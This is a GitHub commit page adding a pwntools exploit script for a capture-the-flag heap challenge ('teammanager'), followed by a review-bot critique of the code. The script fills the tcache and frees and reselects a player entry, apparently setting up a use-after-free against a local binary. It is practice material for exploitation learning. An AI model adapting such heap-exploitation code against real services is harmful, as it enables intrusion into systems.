This repository has been archived by the owner on Mar 1, 2023. It is now read-only.

Add tcache_tear files
lromerio committed Jun 18, 2021
1 parent 2b03abe commit 3f94bde
Showing 3 changed files with 70 additions and 0 deletions.
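--- a/20210608_teammanager/exploit.py
+++ b/20210608_teammanager/exploit.py
@@ -0,0 +1,70 @@
+from pwn import *
+
+
+# Path to the target binary
+BINARY = './team2'
+
+# Host and port where the challenge is running
+HOST = 'localhost'
+PORT = 9997
+
+
+e = ELF(BINARY)
+context.binary = e
+
+r = remote(HOST, PORT)
+
+def add_player(name="a"):
+r.sendline("1")
+r.sendline(name)
+r.sendline("2")
+r.sendline("2")
+r.sendline("2")
+r.sendline("2")
+
+def delete_player(idx=0):
+r.sendline("2")
+r.sendline(str(idx))
+
+def select_player(idx=0):
+r.sendline("3")
+r.sendline(str(idx))
+
+def show_player(idx=0):
+r.sendline("5")
+r.sendline(str(idx))
+
+
+print(e.got['free'])
+
+
+largename = 'a'*0x80
+shortname = 'b'*0x18
+
+
+# fill tcache, players from 0 to 6
+log.info("Filling tcache")
+for i in range(4):
+add_player(largename)
+for i in range(4):
+delete_player(i)
+
+
+# now we have only one block in the true bins
+# which is the last pstruct created
+
+log.info("Creating pstruct 1 and 2")
+add_player() #pstruct 1
+add_player() #pstruct 2
+
+
+log.info("Selecting p7")
+select_player(7)
+log.info("Deleting p7")
+delete_player(7)
+
+show_player(3)
+r.sendline("6")
+
+r.interactive()
+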
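Review bot: The comment `# fill tcache, players from 0 to 6` disagrees with the two `for i in range(4)` loops under it, which only touch indices 0–3, so the heap state the rest of the script relies on is documented incorrectly; the comment should state the indices the loops actually use. Every `r.sendline(...)` call passes a `str`, which pwntools flags with a BytesWarning on Python 3; send bytes instead, e.g. `r.sendline(b"1")` and `r.sendline(str(idx).encode())`. `print(e.got['free'])` looks like leftover debugging and prints the address in decimal; `log.info(hex(e.got['free']))` would match the logging used elsewhere in the file. `shortname` is assigned but never used in the visible code and can be dropped.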
Binary file not shown.
Binary file added 20210620_tcache_tear/tcache_tear
Binary file not shown.
